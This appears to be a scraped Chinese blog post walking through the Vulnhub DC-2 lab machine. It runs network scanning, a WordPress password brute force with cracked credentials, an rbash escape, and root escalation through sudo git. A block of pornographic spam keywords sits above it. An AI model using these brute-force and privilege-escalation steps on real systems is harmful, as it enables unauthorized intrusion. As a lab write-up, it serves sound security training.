日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

【Vulnhub靶机系列】DC2

發布時間:2024/1/23 编程问答 45 豆豆
生活随笔 收集整理的這篇文章主要介紹了 【Vulnhub靶机系列】DC2 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

基本信息

Kali:192.168.61.145

DC2:192.168.61.162

實驗過程

在Kali中先進行內網探活

sudo arp-scan --interface eth0 192.168.61.1/24

排查篩選得知,192.168.61.162為DC2的IP地址。

接下來用Nmap對DC2進行端口掃描。

nmap -sC -sV -p- -oA ~/vulnhub/DC2 192.168.61.162

可知DC2開啟了80端口和7744端口,根據信息可知7744端口為ssh。

我們先訪問下DC2的80端口。

返回一個錯誤頁面,F12可以看到網頁做了一個301永久重定向。

我們編輯下kali的hosts文件:

sudo vim /etc/hosts

添加一條:

192.168.61.162 dc-2

再次用kali打開dc-2,即可正常顯示:

在頁面中即可找到flag1:

Flag 1: Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl. More passwords is always better, but sometimes you just can’t win them all. Log in as one to see the next flag. If you can’t find it, log in as another.

Flag1提示我們要使用cwel來生成密碼字典

cewl dc-2 > pwd.txt

使用wpscan可以掃出當前wp的漏洞

wpscan --url http://dc-2/

我們用wpscan枚舉出當前存在的用戶,并存入username.txt中。

wpscan --url http://dc-2 -e u

然后我們用剛剛生成的username.txt和pwd.txt進行賬號密碼遍歷:

wpscan --url http://dc-2/ -U username.txt -P pwd.txt

[SUCCESS] ‐ jerry / adipiscing[SUCCESS] ‐ tom / parturient

然后我們打開wp的管理后臺,一般都是wp-admin

http://dc‐2/wp‐admin

Flag 2: If you can't exploit WordPress and take a shortcut, there is another way. Hope you found another entry point.

靶機除了80還有7744(SSH)端口,我們也可以用這2個賬號嘗試下?

jerry無法登錄SSH,但是tom是可以順利登錄SSH

我們先看看tom可以執行那些命令

tom@DC-2:~$ echo $PATH tom@DC-2:~$ echo /home/tom/usr/bin/*

可以看到只能執行less,ls,scp,vi

我們ls下發現flag3.txt,在用less獲取flag3的內容:

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes

感覺這句話的意思像是提示我們要su到jerry,但是我們無法使用su命令

所以我們需要繞過rbash(受限的bash)

tom@DC‐2:~$ BASH_CMDS[a]=/bin/sh;a$ /bin/bashtom@DC‐2:~$ export PATH=$PATH:/bin/tom@DC‐2:~$ export PATH=$PATH:/usr/bin

然后我們切換到jerry,密碼為adipiscing

切換到jerry的家目錄就可以得到flag4.txt.

查找下suid文件

find / -perm -u=s -type f 2>/dev/null

并沒有像dc-1那樣可以利用find?

那么我們看看jerry有沒有可以執行的具有root權限的命令

sudo ‐l

?

這里有一個很明顯的git命令,還是不需要密碼的

https://www.cnblogs.com/zaqzzz/p/12075132.html#3git%E6%8F%90%E6%9D%83

jerry@DC‐2:~$ sudo git ‐p help!/bin/bash

得到最后的final-flag

額外內容


?

rbash另一種繞過方式

# vi編輯shell# 命令模式分別輸入 :set shell=/bin/bash:shelltom@DC‐2:~$ vi shelltom@DC‐2:~$ export PATH=/usr/sbin:/usr/bin:/sbin:/bintom@DC‐2:~$ su jerryPassword:jerry@DC‐2:/home/tom$

?

另一種查看當前用戶可用命令方式

?

compgen ‐c

創作挑戰賽新人創作獎勵來咯,堅持創作打卡瓜分現金大獎

總結

以上是生活随笔為你收集整理的【Vulnhub靶机系列】DC2的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。